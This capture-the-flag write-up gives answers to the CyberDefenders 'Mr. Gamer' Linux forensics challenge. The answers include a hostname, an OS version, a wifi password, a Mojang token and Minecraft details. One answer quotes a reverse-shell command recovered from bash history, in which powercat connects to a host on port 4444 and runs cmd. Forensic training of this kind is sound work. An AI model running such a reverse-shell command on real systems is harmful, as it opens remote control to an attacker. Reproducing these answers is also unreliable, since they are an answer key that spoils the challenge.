Mr. Gamer Write Up (Cyberdefenders.org)

We are solving Mr. Gamer room today. This room include linux forensic and little bit gaming. Let’s dive to Mr. Gamer room. I used autopsy tool for this investigation.

#1 I use print statements for my logging ->
What is the name of the utility/library the user was looking at exploits for?

Answer

log4j

#2 Mischievous Lemur ->
What is the version ID number of the operating system on the machine?

Answer

21.10

#3 $whoami ->
What is the hostname of the computer?

Answer

rshell-lenovo

#4 A little blue birdie told me ->
What is one anime that the user likes?

Answer

attack on titan

#5 Into the Matrix, we go ->
What is the UUID for the attacker’s Minecraft account?

Answer

8b0dec19-b463–477e-9548-eef20c861492

#6 Today’s Youtube video is sponsored by… ->
What VPN client did the user install and use on the machine?

Answer

zerotier-vpn

#7 Be our guest ->
What was the user’s first password for the guest wifi?

Answer

093483

#8 If a picture is worth a thousand words, how many is a video worth? -
The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?

Answer

265342

#9 I’m hungry for videos ->
What is the new channel name for the YouTuber whose cookbook is shown on the device?

Answer

Babish Culinary Universe

#10 Hunt the Wumpus ->
What is the module with the highest installed version for the chat application with the mascot Wumpus?

Answer

discord_voice

#11 It’s raining ocelots and wolves ->
According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?

Answer

45F

#12 Never gonna give… up on this question ->
What is the upload date of the second youtube video on the channel from which the user downloaded a youtube video?

If we go to the YouTube channel for Rick, the second video was uploaded on 10/25/2009.

Answer

10/25/2009

#13 Buzzy Bees ->
What is the SHA-1 hash of Minecraft’s “latest” release according to the system?

You can find a version file at the path:

home\rafael\.minecraft\versions\version_manifest_v2.json

Answer

3c6e119c0ff307accf31b596f9cd47ffa2ec6305

#14 The RCE is base(64)d on what? ->
What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was “powercat -D Y -l a -n,” the answer would be “-D Y -l a -n”)

Use bash history:

home\rafael\.bash_history

Answer

-c 192.168.191.253 -p 4444 -e cmd

#15 Hello (New) World ->
How many dimensions (including the overworld) did the player travel to in the “oldest of the worlds”?

Answer

one

#16 Matrix_1999 is the key! ->
What is the mojangClientToken stored in the Keystore?

Answer

2f76c8b04c004ddd888a05a6cad6be52

\